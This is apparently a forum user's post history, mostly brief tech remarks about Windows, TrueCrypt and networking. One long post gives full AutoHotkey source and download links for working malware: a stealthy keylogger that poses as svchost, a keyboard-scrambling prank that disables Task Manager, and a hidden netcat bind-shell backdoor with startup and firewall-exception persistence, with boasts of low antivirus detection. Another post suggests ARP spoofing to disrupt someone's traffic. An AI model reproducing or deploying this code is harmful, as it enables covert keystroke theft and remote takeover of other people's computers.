Everything posted by sablefoxx

  1. I love Sandboxie, but there'll probably never be a 64-bit version due to the Kernel protection built into Windows Vista/7, it'd be awesome to have something as robust as Sandboxie built into the OS. Yeah, lol, Thinstall (just recently renamed to "thinapp") is very useful (kinda an old post) http://hak5.org/forums/index.php?showtopic...mp;hl=Thinstall
  2. TrueCrypt will do this (see "truecrypt hidden volumes"), just be sure not to write too much data or you may erase data in the 'hidden volume', plus TrueCrypt works on almost any OS.
  3. Been running the beta of Windows 7 for a couple days and i noticed that in the Task Manager, when you right click on a process there is now an option called "UAC Virtualization", does anyone know what this does? I did some Googling but i could only find information on Vista, i also noticed that they finally added "Open File Location" and "Go to Service(s)" to the right click menu by default (yay!).
  4. Was anyone actually able to buy them at that price?
  5. Thing is i never used any of those apps, so i like that they took them out. I had the same problem, so i downloaded it using IE7 and it worked fine got it at about 700Kb-1Mb down.
  6. If you liked the Wii Fail talk check out the "deconstructing the xbox security system" video, it's a couple years old but still very interesting to watch.
  7. Yeah, alrdy did this a while ago, here is my post (with full source): http://hak5.org/forums/index.php?showtopic=11136
  8. MD5 SSL signed certs are history...
  9. The zunes are not 'Bricked' they will work again on 1/1/09...off by one error by M$ (surprise, surprise)
  10. Most modern AVs have kernel hooks so you can't stop the service (that's what "net stop [service name here]" does) or kill the service from user space, also "kill" isn't a command (at least in Vista/XP), so you're missing the kill.exe (if there is one), you could at least change it to "taskkill /f /im [name here]" but again, you can't taskkill most AV processes either (kernel hooks again). So it won't work sorry...
  11. There are some really interesting talks here, check out the iphone talk!
  12. sablefoxx

    BSoDomizer

    awesome video, im gonna have to pick one of these up myself
  13. Is it possible to change your MAC in Vista without 3rd party software (i know i can do that)?
  14. From command line type: ipconfig /all

      You Should See Something Like This:

      Microsoft Windows [Version 6.0.6001]
      Copyright © 2006 Microsoft Corporation. All rights reserved.

      C:\Users\Sable>ipconfig /all

      Windows IP Configuration

         Host Name . . . . . . . . . . . . : Sable-PC
         Primary Dns Suffix . . . . . . . :
         Node Type . . . . . . . . . . . . : Hybrid
         IP Routing Enabled. . . . . . . . : No
         WINS Proxy Enabled. . . . . . . . : No
         DNS Suffix Search List. . . . . . :

      Ethernet adapter Local Area Connection 2:

         Media State . . . . . . . . . . . : Media disconnected
         Connection-specific DNS Suffix . :
         Description . . . . . . . . . . . : NVIDIA nForce 10/100/1000 Mbps Ethernet # 2
         Physical Address. . . . . . . . . : 00-04-4B-18-89-25
         DHCP Enabled. . . . . . . . . . . : Yes
         Autoconfiguration Enabled . . . . : Yes

      Ethernet adapter Local Area Connection:

         Connection-specific DNS Suffix . :
         Description . . . . . . . . . . . : NVIDIA nForce 10/100/1000 Mbps Ethernet
         Physical Address. . . . . . . . . : 00-04-4B-18-89-26
         DHCP Enabled. . . . . . . . . . . : Yes
         Autoconfiguration Enabled . . . . : Yes
         Link-local IPv6 Address . . . . . : fe80::e541:a2f7:692c:f5df%10(Preferred)
         IPv4 Address. . . . . . . . . . . : 192.168.1.105(Preferred)
         Subnet Mask . . . . . . . . . . . : 255.255.255.0
         Lease Obtained. . . . . . . . . . : Sunday, December 14, 2008 6:35:12 PM
         Lease Expires . . . . . . . . . . : Monday, December 15, 2008 6:35:10 PM
         Default Gateway . . . . . . . . . : 192.168.1.1
         DHCP Server . . . . . . . . . . . : 192.168.1.1
         DNS Servers . . . . . . . . . . . : 208.67.220.222
                                             208.67.220.220
         NetBIOS over Tcpip. . . . . . . . : Enabled

      Ethernet adapter VMware Network Adapter VMnet1:

         Connection-specific DNS Suffix . :
         Description . . . . . . . . . . . : VMware Virtual Ethernet Adapter for VMnet 1
         Physical Address. . . . . . . . . : 00-50-56-C0-00-01
         DHCP Enabled. . . . . . . . . . . : No
         Autoconfiguration Enabled . . . . : Yes
         Link-local IPv6 Address . . . . . : fe80::78cc:ec89:556b:5865%14(Preferred)
         IPv4 Address. . . . . . . . . . . : 192.168.80.1(Preferred)
         Subnet Mask . . . . . . . . . . . : 255.255.255.0
         Default Gateway . . . . . . . . . :
         DNS Servers . . . . . . . . . . . : fec0:0:0:ffff::1%1
                                             fec0:0:0:ffff::2%1
                                             fec0:0:0:ffff::3%1
         NetBIOS over Tcpip. . . . . . . . : Enabled

      Ethernet adapter VMware Network Adapter VMnet8:

         Connection-specific DNS Suffix . :
         Description . . . . . . . . . . . : VMware Virtual Ethernet Adapter for VMnet 8
         Physical Address. . . . . . . . . : 00-50-56-C0-00-08
         DHCP Enabled. . . . . . . . . . . : No
         Autoconfiguration Enabled . . . . : Yes
         Link-local IPv6 Address . . . . . : fe80::f1fe:3f0f:75cd:3f33%16(Preferred)
         IPv4 Address. . . . . . . . . . . : 192.168.49.1(Preferred)
         Subnet Mask . . . . . . . . . . . : 255.255.255.0
         Default Gateway . . . . . . . . . :
         DNS Servers . . . . . . . . . . . : fec0:0:0:ffff::1%1
                                             fec0:0:0:ffff::2%1
                                             fec0:0:0:ffff::3%1
         NetBIOS over Tcpip. . . . . . . . : Enabled

      Ethernet adapter Hamachi:

         Connection-specific DNS Suffix . :
         Description . . . . . . . . . . . : Hamachi Network Interface
         Physical Address. . . . . . . . . : 7A-79-05-6E-CC-F9
         DHCP Enabled. . . . . . . . . . . : Yes
         Autoconfiguration Enabled . . . . : Yes
         IPv4 Address. . . . . . . . . . . : 5.110.204.249(Preferred)
         Subnet Mask . . . . . . . . . . . : 255.0.0.0
         Lease Obtained. . . . . . . . . . : Sunday, December 14, 2008 6:35:12 PM
         Lease Expires . . . . . . . . . . : Monday, December 14, 2009 6:39:25 PM
         Default Gateway . . . . . . . . . : 5.0.0.1
         DHCP Server . . . . . . . . . . . : 5.0.0.1
         NetBIOS over Tcpip. . . . . . . . : Enabled

      Tunnel adapter Local Area Connection* 6:

         Media State . . . . . . . . . . . : Media disconnected
         Connection-specific DNS Suffix . :
         Description . . . . . . . . . . . : isatap.{660BF523-F59D-4E88-8BDA-9072838DB 3D8}
         Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
         DHCP Enabled. . . . . . . . . . . : No
         Autoconfiguration Enabled . . . . : Yes

      Tunnel adapter Local Area Connection* 7:

         Media State . . . . . . . . . . . : Media disconnected
         Connection-specific DNS Suffix . :
         Description . . . . . . . . . . . : isatap.{7884D6F6-C939-428B-ABD1-B1AA1AE16 317}
         Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
         DHCP Enabled. . . . . . . . . . . : No
         Autoconfiguration Enabled . . . . : Yes

      Tunnel adapter Local Area Connection* 11:

         Media State . . . . . . . . . . . : Media disconnected
         Connection-specific DNS Suffix . :
         Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
         Physical Address. . . . . . . . . : 02-00-54-55-4E-01
         DHCP Enabled. . . . . . . . . . . : No
         Autoconfiguration Enabled . . . . : Yes

      Tunnel adapter Local Area Connection* 12:

         Media State . . . . . . . . . . . : Media disconnected
         Connection-specific DNS Suffix . :
         Description . . . . . . . . . . . : isatap.{315E2282-04A0-436D-AB07-3BA1C3972 1CD}
         Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
         DHCP Enabled. . . . . . . . . . . : No
         Autoconfiguration Enabled . . . . : Yes

      Tunnel adapter Local Area Connection* 13:

         Media State . . . . . . . . . . . : Media disconnected
         Connection-specific DNS Suffix . :
         Description . . . . . . . . . . . : isatap.{30170173-8B5D-4A76-A0A3-491C5060B 023}
         Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
         DHCP Enabled. . . . . . . . . . . : No
         Autoconfiguration Enabled . . . . : Yes

      Tunnel adapter Local Area Connection* 14:

         Connection-specific DNS Suffix . :
         Description . . . . . . . . . . . :
         Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
         DHCP Enabled. . . . . . . . . . . : No
         Autoconfiguration Enabled . . . . : Yes
         Link-local IPv6 Address . . . . . : fe80::5efe:192.168.1.105%19(Preferred)
         Default Gateway . . . . . . . . . :
         DNS Servers . . . . . . . . . . . : 208.67.220.222
                                             208.67.220.220
         NetBIOS over Tcpip. . . . . . . . : Disabled

      Tunnel adapter Local Area Connection* 15:

         Connection-specific DNS Suffix . :
         Description . . . . . . . . . . . : isatap.{95843465-6F84-4848-B61C-290E4A1CD 9D1}
         Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
         DHCP Enabled. . . . . . . . . . . : No
         Autoconfiguration Enabled . . . . : Yes
         Link-local IPv6 Address . . . . . : fe80::200:5efe:5.110.204.249%21(Preferred )
         Default Gateway . . . . . . . . . :
         NetBIOS over Tcpip. . . . . . . . : Disabled

      Tunnel adapter Local Area Connection* 16:

         Connection-specific DNS Suffix . :
         Description . . . . . . . . . . . : 6TO4 Adapter
         Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
         DHCP Enabled. . . . . . . . . . . : No
         Autoconfiguration Enabled . . . . : Yes
         IPv6 Address. . . . . . . . . . . : 2002:56e:ccf9::56e:ccf9(Preferred)
         Default Gateway . . . . . . . . . : 2002:c058:6301::c058:6301
         NetBIOS over Tcpip. . . . . . . . : Disabled

      C:\Users\Sable>

      Here is the subnet (Ethernet adapter Local Area Connection):

         Subnet Mask . . . . . . . . . . . : 255.255.255.0
  15. i still got invites, pm me if ya need one
  16. Almost no CPU load, takes about 4k memory
  17. WARNING VERY LONG POST!

      For some time now, i've been coding stuff in c, in fact i wrote versions of keyl and keyr in c, then i found ahk while trying to find a way to install my cmdo payload in a single .exe, turns out ahk has been used on this forum before, but i forgot about it until a few days ago. AHK is an awesome scripting lang that takes all the hard work out of keyboard hooks! So i re-wrote the apps, and here is the ahk source code, so everyone can learn how fun and easy this scripting lang is. Post bugs if you find them, and have fun! Feel free to hack/mod/use this code any way you want (works nicely with usb payloads). :)

      None of these programs are illegal. Morality and legality lie in the application of knowledge, not in the information itself. PM/IRC/AIM me with questions.

      PROGRAMS AND FEATURES

      1. Keyr
      -Randomizes Keys on the keyboard
      -Adds itself to startup (regkey)
      -Works on WinXP / Vista
      -Disables Task Mgr (regkey)
      -Press WinKey + X to quit
      -Only about 10% of AntiVirus found it (VirusTotal)
      [Download keyr v1] MD5...: de40e57473c719d84da9b1a9e2527a86

      2. Keyl
      -Your basic keylogger, saves keystrokes to C:\WINDOWS\keyl.txt
      -Adds itself to startup (RegKey)
      -Completely Stealthed
      -Looks like svchost while running
      -Works on XP / Vista
      -Press WinKey + X to quit
      -Only about 5% of AntiVirus found it (VirusTotal)
      [Download keyl v1.1] MD5...: ebb7ab566064661707956a64be7f01b3

      3.
Cmdo -Updated Cmdo Payload -Installs a Netcat backdoor (reverse shell) -Single .exe Install File -Adds itself to startup (regkey) -Completely Stealthed -In XP adds itself to the firewall exceptions list, and hides itself from the GUI -Easy to use Auto Connect Script -Downside is nc.exe has 68% detection rate (VirusTotal) [Download cmdo v1] MD5...: 260f8f4566635734a8c663358752c108 AHK SOURCE CODE So basically for all of them, there is the actual .exe's (contain the payload), and the install file, the install file only needs to be run once, and it adds regkeys/makes dirs/sets attribs/etc, i commented the code best i could >Keyr keyr_install.exe ;Install Keyr.exe into root of C: ;Keyr Script has to be compiled first! #NoTrayIcon FileInstall, .\keyr.exe, C:\keyr.exe ;add to startup RegWrite REG_SZ,HKEY_LOCAL_MACHINE,software\microsoft\windows\currentversion\run,keyr,C:\keyr.exe ;disable task mgr RegWrite REG_DWORD,HKEY_CURRENT_USER,software\microsoft\windows\currentversion\policies\system,DisableTaskMgr,1 FileSetAttrib, +SH, C:\keyr.exe Run C:\keyr.exe ExitApp keyr.exe ;KeyStroke Randomizer ;keyr.exe v1.0 ;By SableFoXx #NoEnv #NoTrayIcon #InstallKeybdHook #x:: MsgBox, Exit Function Invoked ExitApp ;---------------- ; ALPHA KEYS ;---------------- ; The $ stops recusrion $a::GetAlpha() $b::GetAlpha() $c::GetAlpha() $d::GetAlpha() $e::GetAlpha() $f::GetAlpha() $g::GetAlpha() $h::GetAlpha() $i::GetAlpha() $j::GetAlpha() $k::GetAlpha() $l::GetAlpha() $m::GetAlpha() $n::GetAlpha() $o::GetAlpha() $p::GetAlpha() $q::GetAlpha() $r::GetAlpha() $s::GetAlpha() $t::GetAlpha() $u::GetAlpha() $v::GetAlpha() $w::GetAlpha() ;$x::GetAlpha() - Only if you're evil $y::GetAlpha() $z::GetAlpha() ; Don't Forget CAPS! 
$+a::GetAlpha() $+b::GetAlpha() $+c::GetAlpha() $+d::GetAlpha() $+e::GetAlpha() $+f::GetAlpha() $+g::GetAlpha() $+h::GetAlpha() $+i::GetAlpha() $+j::GetAlpha() $+k::GetAlpha() $+l::GetAlpha() $+m::GetAlpha() $+n::GetAlpha() $+o::GetAlpha() $+p::GetAlpha() $+q::GetAlpha() $+r::GetAlpha() $+s::GetAlpha() $+t::GetAlpha() $+u::GetAlpha() $+v::GetAlpha() $+w::GetAlpha() $+x::GetAlpha() $+y::GetAlpha() $+z::GetAlpha() CapsLock::MsgBox, WARNING: This Button Does Nothing! ;---------------- ; NUM KEYS ;---------------- $0::GetNum() $1::GetNum() $2::GetNum() $3::GetNum() $4::GetNum() $5::GetNum() $6::GetNum() $7::GetNum() $8::GetNum() $9::GetNum() $Numpad0::GetNum() $Numpad1::GetNum() $Numpad2::GetNum() $Numpad3::GetNum() $Numpad4::GetNum() $Numpad5::GetNum() $Numpad6::GetNum() $Numpad7::GetNum() $Numpad8::GetNum() $Numpad9::GetNum() ;Fun-Sions GetNum(){ Random, num, 0, 10 if(num = 10) Shutdown, 4 else SendInput, %num% } GetAlpha(){ ; I wish i could so a switch() Random, alpha, 1, 26 If(alpha = 1) SendInput, a If(alpha = 2) SendInput, b If(alpha = 3) SendInput, c If(alpha = 4) SendInput, d If(alpha = 5) SendInput, e If(alpha = 6) SendInput, f If(alpha = 7) SendInput, g If(alpha = 8) SendInput, h If(alpha = 9) SendInput, i If(alpha = 10) SendInput, j If(alpha = 11) SendInput, k If(alpha = 12) SendInput, l If(alpha = 13) SendInput, m If(alpha = 14) SendInput, n If(alpha = 15) SendInput, o If(alpha = 16) SendInput, p If(alpha = 17) SendInput, q If(alpha = 18) SendInput, r If(alpha = 19) SendInput, s If(alpha = 20) SendInput, t If(alpha = 21) SendInput, u If(alpha = 22) SendInput, v If(alpha = 23) SendInput, w If(alpha = 24) SendInput, x If(alpha = 25) SendInput, y If(alpha = 26) SendInput, z } ; -=d0tmayhem=- >keyl keyl_install.exe ;Install Svchost.exe into the root C:\ ;Keyl Script has to be compiled first, ;and renamed to svchost, after being compiled ;============================================== #NoTrayIcon ;Remove old one IfNotExist, C:\svchost.exe, goto install 
SendInput, #x Sleep, 1000 FileSetAttrib, -SH, C:\svchost.exe install: FileInstall, .\svhost.exe, C:\svhost.exe, 1 RegWrite REG_SZ,HKEY_LOCAL_MACHINE,software\microsoft\windows\currentversion\run,svchost,C:\svchost.exe FileSetAttrib, +SH, C:\svchost.exe Run, C:\svchost.exe ExitApp keyl.exe ;======================= ; Keylogger (keyl.exe) ; By SableFoXx ; v1.1 ;======================= #NoEnv #NoTrayIcon #InstallKeybdHook #SingleInstance, Force SetWorkingDir %SystemRoot% FileAppend, `n[%A_MM%/%A_DD%/%A_YYYY% %A_hour%:%A_min%], C:\WINDOWS\keyl.txt Spc := " " #x:: ;WinKey + X to stop program MsgBox, 0, -=d0tmayhem=-, Keyl has been stopped, 10 ExitApp ;---------------- ; ALPHA KEYS ;---------------- $a::AlphaKey("a", "A") $b::AlphaKey("b", "B") $c::AlphaKey("c", "C") $d::AlphaKey("d", "D") $e::AlphaKey("e", "E") $f::AlphaKey("f", "F") $g::AlphaKey("g", "G") $h::AlphaKey("h", "H") $i::AlphaKey("i", "I") $j::AlphaKey("j", "J") $k::AlphaKey("k", "K") $l::AlphaKey("l", "L") $m::AlphaKey("m", "M") $n::AlphaKey("n", "N") $o::AlphaKey("o", "O") $p::AlphaKey("p", "P") $q::AlphaKey("q", "Q") $r::AlphaKey("r", "R") $s::AlphaKey("s", "S") $t::AlphaKey("t", "T") $u::AlphaKey("u", "U") $v::AlphaKey("v", "V") $w::AlphaKey("w", "W") $x::AlphaKey("x", "X") $y::AlphaKey("y", "Y") $z::AlphaKey("z", "Z") ;**Caps Keys** $+a::TransKey("+a", "A") $+b::TransKey("+b", "B") $+c::TransKey("+c", "C") $+d::TransKey("+d", "D") $+e::TransKey("+e", "E") $+f::TransKey("+f", "F") $+g::TransKey("+g", "G") $+h::TransKey("+h", "H") $+i::TransKey("+i", "I") $+j::TransKey("+j", "J") $+k::TransKey("+k", "K") $+l::TransKey("+l", "L") $+m::TransKey("+m", "M") $+n::TransKey("+n", "N") $+o::TransKey("+o", "O") $+p::TransKey("+p", "P") $+q::TransKey("+q", "Q") $+r::TransKey("+r", "R") $+s::TransKey("+s", "S") $+t::TransKey("+t", "T") $+u::TransKey("+u", "U") $+v::TransKey("+v", "V") $+w::TransKey("+w", "W") $+x::TransKey("+x", "X") $+y::TransKey("+y", "Y") $+z::TransKey("+z", "Z") ;---------------- ; NUM KEYS 
;---------------- $0::GenKey("0") $1::GenKey("1") $2::GenKey("2") $3::GenKey("3") $4::GenKey("4") $5::GenKey("5") $6::GenKey("6") $7::GenKey("7") $8::GenKey("8") $9::GenKey("9") ;**Numpad Keys** $Numpad0::GenKey("0") $Numpad1::GenKey("1") $Numpad2::GenKey("2") $Numpad3::GenKey("3") $Numpad4::GenKey("4") $Numpad5::GenKey("5") $Numpad6::GenKey("6") $Numpad7::GenKey("7") $Numpad8::GenKey("8") $Numpad9::GenKey("9") ;**NumPad Symbls** $NumpadDot::GenKey(".") $NumpadDiv::GenKey("/") $NumpadSub::GenKey("-") $NumpadMult::GenKey("*") $NumpadAdd::ModfKey("+") $NumpadDel::ModfKey("Del") $NumpadEnd::ModfKey("End") $NumpadHome::ModfKey("Home") $NumpadPgUp::ModfKey("PgUp") $NumpadPgDn::ModfKey("PgDn") $NumpadIns::ModfKey("Insert") $NumpadEnter::ModfKey("Enter") ;---------------- ; FUNC KEYS ;---------------- $F1::ModfKey("F1") $F2::ModfKey("F2") $F3::ModfKey("F3") $F4::ModfKey("F4") $F5::ModfKey("F5") $F6::ModfKey("F6") $F7::ModfKey("F7") $F8::ModfKey("F8") $F9::ModfKey("F9") $F10::ModfKey("F10") $F11::ModfKey("F11") $F12::ModfKey("F12") ;---------------- ; SYBL KEYS ;---------------- $+0::TransKey("+0", ")") $+3::TransKey("+3", "#") $+4::TransKey("+4", "$") $+5::TransKey("+5", "%") $+6::TransKey("+6", "^") $+7::TransKey("+7", "&") $+8::TransKey("+8", "*") $+9::TransKey("+9", "(") $-::GenKey("-") $=::GenKey("=") $[::GenKey("[") $]::GenKey("]") $;::GenKey(";") $'::GenKey("'") $,::GenKey(",") $.::GenKey(".") $/::GenKey("/") $\::GenKey("\") $+-::GenKey("_") $+`::GenKey("~") $+;::GenKey(":") $+,::GenKey("<") $+.::GenKey(">") $+/::GenKey("?") $+\::GenKey("|") $+[::ModfKey("{") $+]::ModfKey("}") $+=::ModfKey("+") $`::TransKey("``", "``") ;---------------- ; SPCL KEYS ;---------------- ;These are used by ahotkey ;and need SendRaw to work $+1:: SendRaw, ! 
FileAppend, !, C:\WINDOWS\keyl.txt Return $+2:: SendRaw, @ FileAppend, @, C:\WINDOWS\keyl.txt Return $+':: SendRaw, " FileAppend, ", C:\WINDOWS\keyl.txt Return ;---------------- ; MODF KEYS ;---------------- $!::ModfKey("Alt") $^::ModfKey("Ctrl") $Tab::ModfKey("Tab") $End::ModfKey("End") $Home::ModfKey("Home") $PgUp::ModfKey("PgUp") $PgDn::ModfKey("PgDn") $Enter::ModfKey("Enter") $Pause::ModfKey("Pause") $+Pause::ModfKey("Break") $Insert::ModfKey("Insert") $Delete::ModfKey("Delete") $Backspace::ModfKey("Backspace") $PrintScreen::ModfKey("PrintScreen") $CapsLock::CapsLock() $Space:: SendInput, {Space} FileAppend, %Spc%, C:\WINDOWS\keyl.txt Return ;======================================================== ; FUNCTIONS ;======================================================== ;GenKey - Generic Key, takes one argument (the keystroke), appends same value to log ;Alpahkey - Takes the lower(akey)/upper(ukey) case alpha value and returns a lower, or upper ; depending on the state in which CapsLock is set ;TransKey - Translate Key, takes two arguments, the first is the raw keystroke (skey) and ; the secound is the alrdy translated key you want appended to the log file (xkey) ;ModfKey - Modifer Key, these are your ALT, WIN, and TAB keys, the arg should be the string you ; want passed to SendInput, Modf key strokes are marked with "[" and "]" in the log file ;CapsLock - First finds what state the CapsLock is in, then toggles it and appends the log ; file with either [CAPS-ON] or [CAPS-OFF] GenKey(gkey){ SendInput, %gkey% FileAppend, %gkey%, C:\WINDOWS\keyl.txt } AlphaKey(akey, ukey){ state := GetKeyState("Capslock", "T") if(state == "0"){ SendInput, %akey% FileAppend, %akey%, C:\WINDOWS\keyl.txt }else{ SendInput, %ukey% FileAppend, %ukey%, C:\WINDOWS\keyl.txt } } TransKey(skey, xkey){ SendInput, %skey% FileAppend, %xkey%, C:\WINDOWS\keyl.txt } ModfKey(mkey){ SendInput, {%mkey%} FileAppend, [%mkey%], C:\WINDOWS\keyl.txt } CapsLock(){ state := GetKeyState("Capslock", "T") 
if(state == "1"){ SetCapsLockState, Off FileAppend, [CAPS-OFF], C:\WINDOWS\keyl.txt }else{ SetCapsLockState, On FileAppend, [CAPS-ON], C:\WINDOWS\keyl.txt } } ; -=d0tmayhem=- >Cmdo [Download .exes] cmdo_install.exe ;Setup Cmdo Payload ;By SableFoXx #NoEnv #NoTrayIcon FileCreateDir, C:\cmdo FileSetAttrib, +SH, C:\cmdo FileInstall, .\cmdo.exe, C:\cmdo\cmdo.exe FileInstall, .\hidec.exe, C:\cmdo\hidec.exe FileInstall, .\nc.exe, C:\cmdo\nc.exe FileSetAttrib, +SH, C:\cmdo\cmdo.exe FileSetAttrib, +SH, C:\cmdo\hidec.exe FileSetAttrib, +SH, C:\cmdo\nc.exe ;Startup Key XP / VISTA RegWrite REG_SZ,HKEY_LOCAL_MACHINE,software\microsoft\windows\currentversion\run,svchost,C:\cmdo\cmdo.exe IfExist C:\WINDOWS\system32\wuapp.exe goto done xp: ;XP Firewall Key RegWrite REG_SZ,HKEY_LOCAL_MACHINE,SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List,C:\cmdo\nc.exe,C:\cmdo\nc.exe:*:Enabled:@xpsp2res.dll,-22019 goto done done: Run, C:\cmdo\cmdo.exe ExitApp cmdo.exe ;Cmdo.exe ;by SableFoXx ;Runs NC #NoEnv #NoTrayIcon #SingleInstance, Force Run, C:\cmdo\hidec.exe nc.exe -l -t -p 69 -d -e cmd.exe ExitApp Information is Free Damn that was a long post :)
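From the defender's side, the registry writes described in post 17 (a Run value named after a system process but pointing outside System32, a Run target in the drive root, DisableTaskMgr set to 1, and an enabled firewall AuthorizedApplications entry for a program outside the usual install roots) can be checked in a `.reg` export. This is an added example, not part of the original post: the sample export is constructed, and the function names and the name/path lists are assumptions.

```python
import ntpath
import re

# Constructed sample in .reg export format (not from a real host); the flagged
# values mirror the registry writes described in the post above.
SAMPLE_REG = r'''
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ExampleUpdater"="\"C:\\Program Files\\Example\\updater.exe\" /background"
"svchost"="C:\\cmdo\\cmdo.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\\cmdo\\nc.exe"="C:\\cmdo\\nc.exe:*:Enabled:@xpsp2res.dll,-22019"
'''

# Assumed, non-exhaustive lists; tune them for the environment being checked.
SYSTEM_NAMES = {"svchost", "lsass", "csrss", "services", "winlogon"}
SYSTEM_DIRS = ("c:\\windows\\system32", "%systemroot%\\system32", "%windir%\\system32")
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files")
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')


def unescape(s):
    # .reg string values escape backslash and double quote with a backslash.
    return re.sub(r'\\(.)', r'\1', s)


def parse_reg(text):
    """Yield (key, value_name, data) for string and dword values in .reg text."""
    key = None
    for line in map(str.strip, text.splitlines()):
        if line.startswith('[') and line.endswith(']'):
            key = line[1:-1]
        elif key and (m := VALUE_RE.match(line)):
            raw = m.group(2)
            if raw.startswith('dword:'):
                yield key, unescape(m.group(1)), int(raw[6:], 16)
            elif len(raw) >= 2 and raw[0] == raw[-1] == '"':
                yield key, unescape(m.group(1)), unescape(raw[1:-1])


def exe_path(command):
    # Executable part of a Run command line: quoted path, else up to ".exe".
    m = re.match(r'\s*(?:"([^"]+)"|(.+?\.exe)\b|(\S+))', command, re.I)
    return next(g for g in m.groups() if g) if m else ""


def findings(text):
    """Return (rule, subject, data) tuples for the indicators listed above."""
    out = []
    for key, name, data in parse_reg(text):
        k = key.lower()
        if k.endswith("\\currentversion\\run") and isinstance(data, str):
            path = exe_path(data).lower()
            stem = ntpath.splitext(ntpath.basename(path))[0]
            folder = ntpath.dirname(path)
            if folder not in SYSTEM_DIRS and (name.lower() in SYSTEM_NAMES or stem in SYSTEM_NAMES):
                out.append(("run-masquerade", name, data))
            elif folder == ntpath.splitdrive(path)[0] + "\\":
                out.append(("run-drive-root", name, data))
        elif k.endswith("\\policies\\system") and name.lower() == "disabletaskmgr" and data == 1:
            out.append(("taskmgr-disabled", name, data))
        elif k.endswith("\\authorizedapplications\\list") and isinstance(data, str):
            parts = data.rsplit(":", 3)   # path : scope : state : display name
            if len(parts) == 4 and parts[2].lower() == "enabled" \
                    and not parts[0].lower().startswith(TRUSTED_ROOTS):
                out.append(("firewall-exception", parts[0], data))
    return out


if __name__ == "__main__":
    for finding in findings(SAMPLE_REG):
        print(finding)
```
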
  18. Google hijacker also hides in your system32 dir, in a few .dll files, not sure what the names are off the top of my head (had to remove it from a computer at work). Not sure if this is the same virus i found but it seemed to have a root-kit like aspect to it, had to boot into a PE to delete the files.
  19. Assuming you're on the same LAN, just ARP Spoof him and redirect his traffic to your computer, then don't route the traffic correctly :)
  20. sablefoxx

    BSoDomizer

    My understanding of it, when i saw it at defcon is that you can edit the code on the device, and change what it displays. Any luck doing so mubix? Segment on the show perhaps?
  21. Well they are very different and each have their own uses, advantages and disadvantages. Not sure exactly what "I'm looking for the best way to be invisible on the net" means. Do you want to make it so people cannot track your browsing habits, or are you trying to communicate with other people and trade files with one another?

      PROXY: Good for anonymous surfing, but is not 100% foolproof

      VPN: Highly encrypted private network that only people you know can access (won't help you surf the internet)

      Note: these two technologies can be combined and used together.